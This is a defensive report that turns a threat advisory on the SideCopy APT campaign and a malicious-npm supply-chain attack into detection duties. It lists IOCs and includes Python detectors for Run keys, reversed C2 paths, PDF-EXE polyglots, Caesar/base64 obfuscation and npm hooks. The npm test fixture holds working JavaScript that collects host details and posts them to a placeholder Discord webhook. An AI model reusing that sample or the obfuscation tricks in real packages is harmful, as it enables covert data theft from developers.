REPORT

Document Title: DSCI THREAT INTELLIGENCE AND RESEARCH INITIATIVE THREAT ADVISORY
Prepared by: Aditya Kumar
Date: 12/07/2025

Index

| Serial Number | Topic | Page number |
|---|---|---|
| 1. | Document Overview | 2 |
| 2. | Key Requirements and Guidelines | 3-13 |

Document Overview

| Field | Details |
|---|---|
| Title | DSCI THREAT INTELLIGENCE AND RESEARCH INITIATIVE THREAT ADVISORY |
| Publisher/Source | A Joint Whitepaper by CSIRT-Fin, CERT-In, and Mastercard |
| Year of Publication | NA |
| Type | Cyber Threat Intelligence / Malware Campaign Report |
| Purpose | To document and analyze a targeted cyber-espionage campaign conducted by SideCopy APT and a separate npm-based supply chain attack, both of which threaten national security, critical infrastructure, and health-related organizations. |

Summary

This report details a widespread, evolving cyber-espionage campaign led by the Pakistan-linked SideCopy APT group, targeting critical Indian government departments, defense institutions, energy sectors, and now extending to health-focused entities such as the Ministry of External Affairs (MEA), posing serious concern for NirveonX, which operates in the AI-health domain. Key infection vectors include spear-phishing emails, spoofed government websites (notably mimicking e-Governance portals), and stealth payloads embedded in HTA, MSI, and LNK files. The group uses custom Remote Access Trojans (CurlBack, Spark, and Xeno RAT), enabling persistent access on both Windows and Linux systems through advanced evasion, fileless execution, and encryption techniques. Additionally, a supply chain attack was discovered involving 60 malicious npm packages that exfiltrate host/network metadata to Discord-based C2 servers, potentially compromising CI/CD environments and developer systems. These operations collectively highlight a multi-pronged targeting strategy, posing risks of data exfiltration, identity compromise, and lateral movement.

Health-sector organizations like NirveonX must act urgently to mitigate exposure to these attack vectors through strict dependency audits, phishing resistance, and robust endpoint monitoring.

Key Requirements or Guidelines

PDF pages 2-5/30

| Item | Description | Type (Recommended/Mandatory) |
|---|---|---|
| Initial Access Vector Monitoring | Monitor for abuse of MSI installers and HTML Application (HTA) files, as these are used in modern APT attacks. | Mandatory |
| DLL Side-loading Detection | Implement detection of DLL side-loading techniques in internal and third-party software execution. | Mandatory |
| Remote Access Tool (RAT) Controls | Block or alert on unauthorized remote access tools like MeshAgent, especially across Linux environments. | Mandatory |
| Spoofed Identity Protection | Enforce anti-spoofing mechanisms (SPF, DKIM, DMARC) and validate external email senders claiming authority. | Mandatory |
| Malicious Domain Blocking | Actively block and monitor fake e-governance and city municipal-themed domains. | Mandatory |
| Open Directory Scanning | Identify and block domains with suspicious open directories that could be used to host malware. | Recommended |
| Website Reputation Management | Prevent loading content from compromised legitimate sites (e.g., the NHP portal), and use threat intel to monitor for abuse. | Recommended |
| Honeytrap Awareness Training | Conduct employee awareness training on honeytrap-style social engineering, especially for sensitive roles. | Recommended |
| Spear-Phishing Simulations | Regularly test phishing resilience via simulations targeting execs or healthcare/AI researchers. | Mandatory |
| Decoy Document Detection | Use sandboxing and deep inspection tools to detect malicious document payloads masquerading as healthcare policies. | Mandatory |
| Platform-Specific Payload Awareness | Implement multi-platform (Windows/Linux) threat detection systems. | Mandatory |
| Impersonation of Government Domains | Monitor for domains/email IDs mimicking .gov.in/.nic.in structures, as seen in NDC phishing. | Mandatory |

NirveonX duty:

| Action | Why It's Required | Legally Written in This PDF? (Yes/No) |
|---|---|---|
| Monitor MSI and HTA execution logs | SideCopy now uses MSI over HTA for stealthier delivery; these initial vectors must be detected | Yes |
| Implement EDR/XDR with DLL injection detection | DLL side-loading is part of the attack chain; EDRs should monitor memory and reflective loads | Yes |
| Block MeshAgent and similar RMM tools | These tools are repurposed in Linux-based targeted attacks | Yes |
| Apply email anti-spoofing standards (SPF, DKIM, DMARC) | Spoofed email identities are used to gain trust | Yes |
| Subscribe to threat intel feeds listing malicious domains | To track phishing pages mimicking civic or government infrastructure | Yes |
| Periodically scan for open directories in 3rd-party dependencies | Attackers exploit open directories for payload delivery | No (Implied) |
| Integrate sandbox detonation for received documents | Decoy PDFs and ZIP payloads are used; sandboxing will reveal them | Yes |
| Build alert rules for gov-like domains in email headers | Prevent confusion from domains like @outlook[.]com vs @nic.in | Yes |
| Include honeytrap scenarios in internal red team exercises | SideCopy reuses social engineering tactics like honeytraps | Yes |
| Educate AI researchers and developers on phishing lures | Especially if working with sensitive health/defense data | Yes |
| Deploy Linux-specific malware detection tools | MeshAgent and RC4/AES loaders are now Linux-compatible | Yes |
| Strengthen perimeter controls around government-affiliated themes | E.g., PDFs mimicking defense/health sector policy updates | Yes |

PDF pages 6-11/30

| Item | Description | Type (Recommended/Mandatory) |
|---|---|---|
| Phishing Domain Detection | Actively detect and block access to spoofed municipal portals, especially on .egoservice[.]in or similar TLDs. | Mandatory |
| Public Service Mimicry Awareness | Train staff on phishing lures mimicking RTS Act portals and city corporation sites. | Mandatory |
| Infrastructure Origin Analysis | Monitor domains registered under suspicious ASN blocks (e.g., AS 140641 - YOTTA NETWORK) linked with abuse. | Recommended |
| Document-Based Payload Detection | Scan PDF/ZIP/DOCX attachments (e.g., fake Pharmaceutical Catalogues) for embedded executables. | Mandatory |
| RAT Detection – CurlBack, Spark | Signature or behavior-based detection for CurlBack, Spark, and related malware on Windows/Linux. | Mandatory |
| Dual-OS Threat Protection | Maintain visibility and defense across both Linux and Windows endpoints. | Mandatory |
| HTA Script Execution Blocking | Block or sandbox .hta files from unknown/untrusted sources. | Mandatory |
| Registry & Task Schedule Monitoring | Monitor abnormal persistence methods: Run keys, scheduled tasks with fake service names like "OneDrive". | Mandatory |
| Anti-VM Evasion Behavior Detection | CurlBack uses anti-VM checks before executing; flag suspicious system behavior attempting this. | Recommended |
| USB Enumeration Recon Defense | Monitor and alert if malware scans USB registries (USBSTOR), a behavior seen in espionage tools. | Recommended |
| Process Monitoring for Malware Evasion | SideCopy monitors common processes to hide; alert if a process manipulates explorer.exe, Defender, etc. | Recommended |
| Spoofed Gov/Health Domain Alerts | Block or alert access to URLs like nhp.mowr.gov.in if verified to be abused/malicious clones. | Mandatory |

NirveonX duty:

| Action | Why It's Required | Legally Written in This PDF? (Yes/No) |
|---|---|---|
| Block access to all .egoservice[.]in subdomains and URLs | These are confirmed phishing hosts mimicking municipal RTS portals | Yes |
| Add YOTTA ASNs to suspicious infrastructure watchlists | Domains used for phishing are registered under AS 140641, likely controlled infrastructure | Yes |
| Deploy sandbox/AV rules for pharma-themed documents | "Pharmaceutical Product Catalogue 2025" contains malware and targets health-linked sectors | Yes |
| Integrate signatures and behavior detection for CurlBack and Spark | SideCopy's latest campaign uses these RATs across OS platforms | Yes |
| Audit HTA file execution across all endpoints | HTA scripts are used to establish persistence (e.g., svnides.hta) | Yes |
| Monitor registry Run keys and scheduled tasks (e.g., OneDrive) | CurlBack maintains persistence through these methods | Yes |
| Flag binaries named similarly to legitimate tools (e.g., CameraSettingsUIHost.exe) | Malware masquerades with misleading filenames to evade detection | Yes |
| Enable monitoring of anti-VM behavior | CurlBack checks for sandbox/VM before executing, indicative of targeted APT behavior | Yes |
| Log registry path access to SYSTEM\ControlSet001\Enum\USBSTOR | Used by CurlBack for host reconnaissance, valuable in insider threat campaigns | Yes |
| Prevent document download from suspicious clones of gov.in sites | E.g., nhp.mowr.gov.in URL used for serving decoy security PDFs with malware | Yes |
| Harden USB access controls on employee devices | Campaign collects USB device metadata, potentially targeting removable data transfers | Recommended |
| Regular phishing simulations involving fake RTS/municipal portals | To prepare staff against local governance-themed phishing attempts | Recommended |

PDF pages 12-19/30

| Item | Description | Type (Recommended/Mandatory) |
|---|---|---|
| UUID-based Client Registration Detection | Monitor for unknown UUID creation in hidden directories (e.g., .client_id.txt in user folders). | Mandatory |
| Reversed URL C2 Pattern Monitoring | Detect C2 traffic patterns using reversed endpoint strings (/retsiger/, /taebtraeh/, etc.). | Mandatory |
| ELF and Windows Payload Dropping Detection | Monitor download and execution of ELF or Windows binaries from unknown PDF archives. | Mandatory |
| Crontab Persistence (Linux) | Detect unusual entries in /dev/shm/ or /etc/crontab pointing to suspicious binaries. | Mandatory |
| Base64 & Caesar Obfuscation Detection | Include decoding routines for Caesar-ciphered and base64-obfuscated resources in behavioral analysis. | Mandatory |
| PDF-EXE Polyglot Detection | Scan for dual-nature files where an executable is hidden after the PDF's %%EOF marker. | Mandatory |
| HTA Stager Blocking | Detect or block .hta files embedding base64 .NET payloads launched by mshta.exe. | Mandatory |
| Registry Key-Based Persistence Detection | Monitor abnormal Run key entries (e.g., Edgre, OneDrive) pointing to non-standard binaries. | Mandatory |
| Memory-Only .NET Assembly Execution Detection | Implement memory scanning to detect .NET payloads decoded and executed in memory. | Mandatory |
| PowerShell ExecutionPolicy Bypass Detection | Monitor for -ExecutionPolicy Bypass and -NoProfile usage by suspicious scripts. | Mandatory |
| Decryption via AES-CBC with base64 IV | Flag and sandbox decryption routines using base64-encoded keys and AES-CBC with PKCS7 padding. | Recommended |
| RAT Behavior Monitoring | Detect features like keylogging, SOCKS5 proxying, or UAC bypass (Xeno RAT behaviors). | Mandatory |
| Domain Registration Surveillance | Track infrastructure with known suspicious registrars (GoDaddy, Hostinger, NameCheap, Internet BS Corp). | Recommended |
| Cloudflare ASN Watch | Monitor abuse of ASN 13335 (Cloudflare) for proxying C2 operations. | Recommended |
| Open RDP Port Alerting | Alert on RDP ports (e.g., 56777) being exposed to the internet, which was seen in C2. | Mandatory |
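The Run-key monitoring called for in the pages 6-11 and 12-19 tables (fake OneDrive/Edgre value names, binaries dropped under ProgramData or AppData, masquerading filenames such as CameraSettingsUIHost.exe, autoruns via mshta.exe), as an added Python check that is not part of the advisory or this report. The legitimate install-path fragments, the drop-directory list and the `reg query` sample output are assumptions constructed for the example:

```python
import re

# Run-value names the advisory says SideCopy persistence imitates (OneDrive, Edgre),
# each mapped to a path fragment where the genuine product installs (assumed here).
LOOKALIKES = {"onedrive": ("\\microsoft\\onedrive\\",), "edge": ("\\microsoft\\edge\\",), "edgre": ()}
# Drop directories the advisory names (ProgramData, AppData) plus other user-writable ones.
SUSPECT_DIRS = ("\\programdata\\", "\\appdata\\roaming\\", "\\temp\\", "\\users\\public\\")
KNOWN_BAD = {"suport.exe", "devapp.exe", "consoleapp1.exe"}   # payload names from the advisory
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
REG_LINE = re.compile(r"^\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$", re.M)

def image_path(command):
    """Extract the executable from a Run value's command line (quoted or not)."""
    m = re.match(r'"([^"]+)"|(\S+)', command.strip())
    return (m.group(1) or m.group(2)) if m else command

def assess_value(name, command):
    """Return the reasons one Run value looks like persistence abuse (empty = clean)."""
    reasons, cmd = [], command.lower()
    exe = image_path(command).lower()
    base = exe.rsplit("\\", 1)[-1]
    for alias, legit_dirs in LOOKALIKES.items():
        if name.lower().startswith(alias) and not any(d in exe for d in legit_dirs):
            reasons.append(f"name imitates '{alias}' but image is outside its install path")
    if any(d in cmd for d in SUSPECT_DIRS):
        reasons.append("command references a user-writable drop directory")
    if base in KNOWN_BAD:
        reasons.append(f"{base} is a payload filename from the advisory")
    # CameraSettingsUIHost.exe is a genuine Windows binary; only copies outside System32 are suspicious.
    if base == "camerasettingsuihost.exe" and "\\system32\\" not in exe:
        reasons.append("CameraSettingsUIHost.exe outside System32 (masquerade)")
    if base in SCRIPT_HOSTS:
        reasons.append(f"autorun launches script host {base}")
    return reasons

def scan_reg_query(output):
    """Parse `reg query ...\\Run` output; map each suspicious value name to its reasons."""
    findings = {}
    for name, command in REG_LINE.findall(output):
        reasons = assess_value(name, command)
        if reasons:
            findings[name] = reasons
    return findings

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` output:
# a genuine OneDrive entry, a genuine system entry and three entries modelled on the advisory.
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive        REG_SZ    "C:\Users\asha\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    OneDriveUpdate  REG_SZ    C:\ProgramData\OneDrive\OneDrive.exe
    Edgre           REG_SZ    "C:\Users\asha\AppData\Roaming\Edgre\CameraSettingsUIHost.exe"
    Updater         REG_SZ    mshta.exe C:\Users\asha\AppData\Roaming\svnides.hta
    SecurityHealth  REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""
```

The same `assess_value` logic applies to scheduled-task actions once the task's command line is extracted, which is how the "OneDrive" task names in the table would be caught.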
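The reversed-endpoint C2 pattern (/retsiger/, /taebtraeh/, /sdnammoc/) and the 1256/56777 port indicators from the tables above, as an added Python detector run over constructed proxy log lines; this is example code, not from the advisory. The log format, the RAT verbs added beyond the three published strings, and the sample lines are assumptions:

```python
import re
from urllib.parse import urlsplit

# Endpoint words the advisory reports appearing reversed in SideCopy/Xeno RAT C2
# traffic (register, heartbeat, commands), plus common RAT verbs added here as an
# assumption so the check generalises beyond the three published strings.
C2_WORDS = {"register", "heartbeat", "commands", "result", "upload", "download", "beacon", "tasks"}
# Destination ports the advisory ties to the campaign's C2 (custom RAT port and RDP).
C2_PORTS = {1256, 56777}
# Constructed log format: <timestamp> <src ip> <dst ip>:<port> <method> <url or path> <status>
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+([\d.]+):(\d+)\s+([A-Z]+)\s+(\S+)")

def reversed_segments(url):
    """Return path segments that spell a known C2 verb when read backwards."""
    hits = []
    for seg in urlsplit(url).path.split("/"):
        word = seg.lower()
        if len(word) >= 5 and word[::-1] in C2_WORDS:
            hits.append(f"/{seg}/ is '{word[::-1]}' reversed")
    return hits

def check_line(line):
    """Return alert reasons for one proxy/firewall log line (empty list = benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    port, url = int(m.group(4)), m.group(6)
    reasons = reversed_segments(url)
    if port in C2_PORTS:
        reasons.append(f"destination port {port} is a known campaign C2 port")
    return reasons

def scan_log(lines):
    """Map each alerting log line to its reasons; benign lines are omitted."""
    findings = {}
    for line in lines:
        reasons = check_line(line)
        if reasons:
            findings[line] = reasons
    return findings

# Constructed sample traffic: three lines modelled on the advisory's indicators
# (reversed endpoints, 79.141.161.58:1256) and two ordinary requests that must not alert.
SAMPLE_LOG = """\
2025-07-12T10:01:03Z 10.0.5.21 79.141.161.58:1256 POST /retsiger/ 200
2025-07-12T10:01:09Z 10.0.5.21 79.141.161.58:1256 GET /taebtraeh/ 200
2025-07-12T10:02:44Z 10.0.5.33 203.0.113.7:443 GET https://updates.widgetservicecenter.com/sdnammoc/ 200
2025-07-12T10:03:10Z 10.0.5.40 198.51.100.5:443 POST https://api.example.com/register/ 201
2025-07-12T10:04:02Z 10.0.5.40 198.51.100.5:443 GET https://www.example.com/static/app.js 200
""".splitlines()
```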
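The PDF-EXE polyglot check from the table above (an executable appended after the final %%EOF), as an added Python example that is not from the advisory; the minimal PDF and the fake PE bytes are constructed for the demonstration. It validates the PE header via e_lfanew rather than trusting a bare "MZ", and treats the multiple %%EOF markers of a legitimate incremental update as clean:

```python
import struct

def is_pe(buf, pos):
    """True if buf[pos:] starts with a DOS header whose e_lfanew points at a PE signature."""
    if buf[pos:pos + 2] != b"MZ" or len(buf) < pos + 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", buf, pos + 0x3C)[0]
    return buf[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\0\0"

def find_appended_executable(data):
    """Describe an executable hidden after a PDF's final %%EOF, or return None.
    Only bytes after the LAST marker count (incremental updates add extra %%EOFs),
    trailing whitespace is ignored, and the trailer is searched for a validated PE
    header or ELF magic anywhere, not just at offset 0, so padding does not hide it.
    """
    if not data.startswith(b"%PDF-"):
        return None                     # not a PDF; outside this check's scope
    idx = data.rfind(b"%%EOF")
    if idx < 0:
        return None
    end = idx + len(b"%%EOF")
    trailer = data[end:]
    if not trailer.strip(b"\r\n\t "):
        return None                     # clean: only line endings after %%EOF
    pos = trailer.find(b"MZ")
    while pos >= 0:
        if is_pe(trailer, pos):
            return {"kind": "Windows PE", "offset": end + pos, "trailing_bytes": len(trailer)}
        pos = trailer.find(b"MZ", pos + 1)
    pos = trailer.find(b"\x7fELF")
    if pos >= 0:
        return {"kind": "Linux ELF", "offset": end + pos, "trailing_bytes": len(trailer)}
    return {"kind": "unknown non-PDF data", "offset": end, "trailing_bytes": len(trailer)}

def carve(data):
    """Return the appended payload bytes for sandbox submission, or b'' if none."""
    hit = find_appended_executable(data)
    return data[hit["offset"]:] if hit else b""

def fake_pe():
    """Constructed minimal PE: 0x40-byte DOS header with e_lfanew pointing at the PE signature."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + b"\x64\x86" + b"\0" * 30

# Constructed samples: a clean PDF, the same PDF with a legitimate incremental update,
# and two polyglots (PE after two padding bytes; ELF directly after %%EOF).
PDF_HEAD = b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\ntrailer<</Root 1 0 R>>\nstartxref\n9\n%%EOF\n"
CLEAN = PDF_HEAD
INCREMENTAL = PDF_HEAD + b"2 0 obj<<>>endobj\nstartxref\n88\n%%EOF\r\n"
PE_POLYGLOT = PDF_HEAD + b"\0\0" + fake_pe()
ELF_POLYGLOT = PDF_HEAD + b"\x7fELF\x02\x01\x01" + b"\0" * 9
```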
NirveonX duty:

| Action | Why It's Required | Legally Written in This PDF? (Yes/No) |
|---|---|---|
| Detect creation of .client_id.txt UUID files | Indicates registration with SideCopy-style C2 | Yes |
| Write YARA rules for reversed C2 strings (e.g., /retsiger/) | These patterns are hardcoded and used in command exchange | Yes |
| Scan PDFs for embedded EXEs after %%EOF | Used to hide and extract executables from document decoys | Yes |
| Enable behavior-based analysis for crontab tasks in /dev/shm/ | Linux persistence vector for stealthy execution | Yes |
| Block .hta file launches by mshta.exe unless signed/trusted | HTA stagers are still used and remain FUD (Fully Undetectable) | Yes |
|"Detect suspicious Run key entries like Edgre, OneDrive | Used to persist payloads across reboots | Yes |
| Sandbox PowerShell commands with ExecutionPolicy Bypass | PowerShell is abused for stealthy payload decryption/execution | Yes |
| Integrate behavior signatures for .NET in-memory execution | SideCopy injects decoded .NET DLLs directly into memory | Yes |
| Detect Caesar cipher obfuscation in scripts and dropped files | Used to obscure payloads and avoid static detection | Yes |
| Flag outbound connections to ports 1256 and 56777 | C2 traffic observed using these ports (RDP and custom RAT port) | Yes |
| Block communication to recent C2 domains (e.g., updates.widgetservicecenter[.]com) | Domains resolved to Cloudflare/HZ Hosting used in campaign | Yes |
| Scan for specific filenames like DevApp.exe, suport.exe | Associated with Xeno RAT's final payload | Yes |
| Map and monitor ASN abuse patterns (AS 13335, AS 202015) | Infrastructure pattern shows centralized C2 planning | Yes |
| Ensure .pdb debug artifacts don't trigger signed binary trust | .pdb-named files used to distribute malware in disguise | Yes |
| Conduct red team simulations of hybrid Windows/Linux infection chains | SideCopy targets both OSes using tailored delivery chains | Recommended |

PDF pages 20-28/30

| Component | Detection/Monitoring Required | Type | Why It's Critical for NirveonX |
|---|---|---|---|
| SEQRITE AV Signatures | Ensure endpoint protection has updated detections for: HTA.SideCopy.*, Trojan.Fmq, SideCopy.Mal.*, LNK.*, etc. | Mandatory | Enables early detection of known payloads and loaders. |
| .lnk Files | Block suspicious .lnk files (e.g., renamed PDFs or schedule documents) | Mandatory | These are used for initial access and masquerade as harmless files. |
| .hta Files | Block or alert on .hta execution, especially via mshta.exe | Mandatory | HTA is used for stealthy stagers and memory-loaded .NET payloads. |
| suport.exe, DevApp.exe, ConsoleApp1.exe | Monitor for hashes and suspicious executables listed | Mandatory | Known payloads including Xeno RAT and loaders (BroaderAspect). |
| Malicious .dll drops (…dll, DUI70.dll) | Detect unusual .dll drops in ProgramData/LavaSoft paths | Mandatory | SideCopy drops malicious DLLs for reflective loading |
| Suspicious Registry Keys | Watch for Run keys named Edgre, OneDrive, or unknown keys in HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Mandatory | Used for persistence by SideCopy |
| .zip Archive Inspection | Detect archives containing dual-nature files (PDF+EXE) | Mandatory | ZIPs like NDC65UpdatedSchedule.zip contain multi-platform payloads |
| Caesar Cipher & Base64 Decoding | Add decoding logic for Caesar (shift 9) and base64 payload decoding | Recommended | SideCopy uses these to obfuscate payloads before decryption |
| Post-EOF PDF Scanning | Detect EXE binaries appended after %%EOF in PDFs | Mandatory | Malware hides executable payloads after legitimate PDF content |
| .client_id.txt File | Monitor hidden home directory files named .client_id.txt | Mandatory | Indicates successful registration with C2 server |
| Xeno RAT C2 Behavior | Watch for connection to 79.141.161.58:1256 and registration strings (/retsiger/, /sdnammoc/) | Mandatory | This is the C2 of the final payload RAT |
| .NET Memory Execution | Monitor .NET assembly execution from memory (e.g., BroaderAspect.dll) | Mandatory | Avoids touching disk; requires behavioral detection |
| Crontab Abuse | Detect entries like /dev/shm/mycron in Linux | Mandatory | Persistence vector for Linux variants |
| Malicious Domains & URLs | Block domains and URLs including: egovservice[.]in, modspaceinterior[.]com, updates.widgetservicecenter[.]com, etc. | Mandatory | Known phishing/malware infrastructure |
| npm PostInstall Script Detection | Flag packages using suspicious post-install hooks (Discord webhook exfiltration) | Mandatory | Part of stealth npm supply chain attack targeting CI/CD |
| Sandbox Evasion Scripts | Detect logic in scripts trying to evade honeypots or VMs | Recommended | Indicates high sophistication; targets real environments |
| Audit for npm Packages | Continuously scan packages via tools like Socket.dev CLI/GitHub App | Mandatory | 60+ malicious npm packages were used for system-level recon |
| Network Recon from JS | Detect JavaScript collecting host info (IP, DNS, hostname, path) and sending to external URLs | Mandatory | Used in stealth npm malware for internal mapping of network assets |
| Discord Webhooks | Block domains and traffic to known Discord webhook endpoints from developer systems | Mandatory | Exfiltration vector from compromised npm modules |
| CI/CD Pipeline Audit | Check pipelines for unverified dependencies and use dependency pinning with hash checks | Mandatory | Attackers are targeting build systems to implant future backdoors |

NirveonX duty:

| Action Item | Justification | Status |
|---|---|---|
| Re-audit npm dependencies and remove any with post-install scripts or unexplained URLs | Protects against the stealth npm attack targeting dev environments | Pending |
| Block domains/IPs listed in SideCopy IOC table | Prevents active C2 communication | Pending |
| Deploy YARA rules for reversed C2 paths and Caesar-shift obfuscation | Improves behavioral malware detection | Pending |
| Monitor PDF files with appended EXEs after %%EOF marker | Core obfuscation used in Xeno RAT delivery | Pending |
| Scan all systems for hashes provided (EXEs, DLLs, ZIPs) | Enables identification of infections post-compromise | Pending |
| Secure CI/CD pipeline: hash pinning, npm audit enforcement, webhook monitoring | Prevents future npm-based data exfiltration and malware staging | Pending |

--The End--
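The Caesar (shift 9) plus base64 decoding logic called for in the pages 12-19 and 20-28 tables, as an added Python routine that is not the advisory's or the malware's code. The layering (base64 first, then a Caesar shift over the base64 text), the payload markers and the fake PE stub are assumptions made for the example; shift 9 is tried first and the remaining shifts are brute-forced, which generalises the check to a sample that uses a different shift:

```python
import base64

def caesar(text, shift):
    """Shift ASCII letters by `shift` places (case kept); digits, '+', '/', '=' untouched."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)

def obfuscate(payload, shift=9):
    """Layering assumed here: base64 first, then Caesar over the base64 text."""
    return caesar(base64.b64encode(payload).decode(), shift)

# Signs that a candidate decode produced a real payload rather than base64 noise.
BINARY_MAGIC = (b"MZ", b"\x7fELF")
TEXT_MARKERS = (b"<script", b"powershell", b"mshta", b"System.Reflection")

def looks_like_payload(blob):
    head = blob[:64]
    return blob.startswith(BINARY_MAGIC) or any(m in head for m in TEXT_MARKERS)

def try_decode(obfuscated, shifts=(9,) + tuple(range(26))):
    """Undo Caesar-over-base64 obfuscation; returns (shift, payload) or None.
    A Caesar shift keeps the text inside the base64 alphabet, so every shift
    "decodes" without error; the marker check is what separates the real payload
    from garbage. Shift 9 (the advisory's value) is tried first, then all others.
    """
    for s in shifts:
        candidate = caesar(obfuscated, -s)
        try:
            blob = base64.b64decode(candidate, validate=True)
        except ValueError:
            continue
        if looks_like_payload(blob):
            return s, blob
    return None

# Constructed sample: a fake PE stub standing in for a resource dropped by a decoy document.
FAKE_PE = b"MZ\x90\x00\x03\x00\x00\x00" + b"This program cannot be run in DOS mode." + b"\0" * 8
OBFUSCATED = obfuscate(FAKE_PE)           # what the obfuscated resource would look like
```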
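The npm post-install hook, host-recon and Discord-webhook checks from the pages 20-28 table, as an added Python audit over constructed package metadata; this is example code, not the advisory's. The package names are hypothetical, the recon regex is a heuristic chosen for the example, and the webhook URL is a placeholder:

```python
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Discord webhook endpoints, the exfiltration channel the advisory describes.
WEBHOOK_RE = re.compile(r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/[^\s'\"`]*", re.I)
# Node APIs that gather the host facts the advisory lists (hostname, IP/DNS, path); heuristic.
RECON_RE = re.compile(r"os\.(?:hostname|networkInterfaces|userInfo)\(|require\(['\"]dns['\"]\)|process\.cwd\(")
URL_RE = re.compile(r"https?://[^\s'\"`]+", re.I)

def script_targets(hook_cmd):
    """Return the .js/.cjs files a hook command executes (e.g. `node setup.js`)."""
    return re.findall(r"[\w./-]+\.c?js\b", hook_cmd)

def audit_package(pkg, files):
    """pkg: parsed package.json dict; files: {relative path: source}. Returns findings."""
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if not cmd:
            continue
        findings.append(f"{hook} hook runs: {cmd}")
        # Inspect the hook command itself and every script file it launches.
        for src in [cmd] + [files.get(t, "") for t in script_targets(cmd)]:
            for url in WEBHOOK_RE.findall(src):
                findings.append(f"{hook}: Discord webhook exfiltration endpoint {url[:45]}")
            if RECON_RE.search(src):
                findings.append(f"{hook}: host/network reconnaissance API calls")
            for url in URL_RE.findall(src):
                if not WEBHOOK_RE.match(url):
                    findings.append(f"{hook}: contacts external URL {url}")
    return findings

def verdict(findings):
    """'block' on exfiltration/recon evidence, 'review' for any install hook, else 'clean'."""
    if any("exfiltration" in f or "reconnaissance" in f for f in findings):
        return "block"
    return "review" if findings else "clean"

# Constructed samples (hypothetical package names): a native add-on with a normal build
# hook, and a package modelled on the advisory's postinstall recon plus webhook exfil.
BENIGN = ({"name": "native-addon-example", "scripts": {"postinstall": "node-gyp rebuild"}}, {})
MALICIOUS_JS = """\
const os = require('os'), https = require('https');
const info = JSON.stringify({h: os.hostname(), u: os.userInfo().username,
  nets: os.networkInterfaces(), cwd: process.cwd(), dir: __dirname});
const req = https.request('https://discord.com/api/webhooks/000000/PLACEHOLDER-TOKEN',
  {method: 'POST', headers: {'Content-Type': 'application/json'}});
req.end(info);
"""
MALICIOUS = ({"name": "eslint-helper-utils-example", "scripts": {"postinstall": "node setup.js"}},
             {"setup.js": MALICIOUS_JS})
```

In a real pipeline the `files` mapping comes from the unpacked tarball, and a "review" verdict on a native add-on is the expected false positive that a signed-dependency allowlist resolves.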